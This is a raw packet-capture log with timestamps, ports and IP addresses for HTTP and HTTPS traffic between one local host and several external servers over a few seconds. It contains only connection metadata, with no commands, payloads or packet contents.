Sep 27, 2024 00:29:07.562412024 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562422991 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562433958 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562444925 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562475920 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.562525988 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562526941 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562526941 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562526941 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.562526941 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.650816917 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650876045 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650902987 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650918961 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650938034 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650949955 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650962114 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650970936 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.650990963 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.650998116 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.651042938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.651042938 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.651071072 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.651124954 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.651124954 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.740369081 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:07.740423918 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:07.740498066 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:07.740998983 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:07.741014957 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:07.851708889 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.851813078 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.851881027 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:07.854091883 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:07.854120016 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.854135990 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:07.854141951 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.872991085 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:07.873034954 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:07.873234987 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:07.874027014 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:07.874046087 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.361975908 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.362063885 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:08.364137888 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:08.364156008 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.364469051 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.366056919 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:08.366085052 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:08.366146088 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.394268990 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:08.394352913 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:08.394958019 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:08.394968987 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:08.396899939 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:08.396904945 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:08.829792976 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.830220938 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.830286980 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:08.830452919 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:08.830467939 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.830496073 CEST	57906	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:08.830502033 CEST	443	57906	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:08.853245020 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:08.853281975 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:08.853351116 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:08.853820086 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:08.853838921 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.341795921 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:09.341885090 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:09.341959953 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:09.347867012 CEST	57905	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:09.347894907 CEST	443	57905	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:09.350205898 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.356848955 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.391736031 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.391860962 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:09.394294024 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:09.394306898 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.394629955 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.396217108 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:09.396323919 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:09.396347046 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.657164097 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657201052 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657212973 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657224894 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657236099 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657270908 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657277107 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657289982 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657295942 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657303095 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657304049 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657306910 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657329082 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657345057 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657346964 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657357931 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657371044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657381058 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657392979 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657439947 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657452106 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657453060 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657464981 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657480001 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657505035 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657526970 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657537937 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657543898 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657556057 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657569885 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657579899 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657597065 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657618999 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657619953 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657629967 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657654047 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657669067 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657685041 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657696962 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657762051 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657773018 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657787085 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657794952 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657797098 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657823086 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657844067 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657850981 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657870054 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657881975 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657892942 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657905102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657929897 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657953024 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.657958031 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657969952 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.657982111 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658019066 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658042908 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658054113 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658066034 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658077955 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658112049 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658128977 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658139944 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658150911 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658169031 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658174992 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658180952 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658194065 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658220053 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658291101 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658303022 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658313990 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658325911 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658337116 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658338070 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658353090 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658375025 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658379078 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658410072 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658435106 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658447027 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658478022 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658494949 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658509970 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658545971 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658557892 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658585072 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658597946 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658618927 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658629894 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658639908 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658653021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658663034 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658667088 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658690929 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658690929 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658709049 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658734083 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658747911 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658785105 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.658807039 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658818960 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.658859015 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.748172998 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:09.748255968 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:09.826237917 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:09.826287985 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:09.826433897 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:09.828442097 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:09.828455925 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:09.900046110 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.900161028 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.900224924 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:09.900444031 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:09.900464058 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.900490046 CEST	57908	443	192.168.2.6	188.114.96.3
Sep 27, 2024 00:29:09.900496006 CEST	443	57908	188.114.96.3	192.168.2.6
Sep 27, 2024 00:29:09.919445038 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:09.919492006 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:09.919567108 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:09.920017958 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:09.920032978 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.406182051 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:10.411094904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:10.411478043 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:10.415793896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:10.420886040 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:10.449306011 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.449927092 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:10.451401949 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:10.451416016 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.451699018 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.453818083 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:10.453818083 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:10.453890085 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.529849052 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:10.529994965 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:10.530545950 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:10.530555964 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:10.532329082 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:10.532335043 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:10.906502008 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.906605959 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.907198906 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:10.907408953 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:10.907408953 CEST	57910	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:10.907432079 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.907440901 CEST	443	57910	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:10.937060118 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:10.937119007 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:10.937271118 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:10.938329935 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:10.938349009 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.062302113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062325001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062336922 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062350035 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062361956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062372923 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062386036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062397957 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062408924 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062422037 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.062455893 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.062491894 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.067924023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.067936897 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.067950010 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.067989111 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.154314995 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154342890 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154356003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154371023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154383898 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154468060 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.154756069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154768944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154782057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154802084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.154814959 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.154834986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.155400991 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.155426979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.155440092 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.155498028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.155512094 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.155513048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.155512094 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.155550003 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.156373978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.156388044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.156402111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.156416893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.156439066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.156455040 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.156472921 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.157234907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.158310890 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.245155096 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.245436907 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.245449066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.245486975 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.246232986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246589899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246599913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246611118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246622086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246655941 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.246668100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246685982 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.246689081 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246700048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246709108 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246721983 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246723890 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.246733904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246741056 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.246766090 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.246768951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246783018 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246835947 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.246851921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246862888 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.246895075 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.247708082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.247719049 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.247729063 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.247772932 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.247776031 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.247785091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.247807980 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.248472929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.248533964 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.248543024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.248577118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.248585939 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.248593092 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.248620033 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.249403000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.249454021 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.249464035 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.249512911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.249516010 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.249525070 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.249578953 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.250245094 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.250283957 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.250284910 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.250298023 CEST	80	57911	147.45.44.104	192.168.2.6
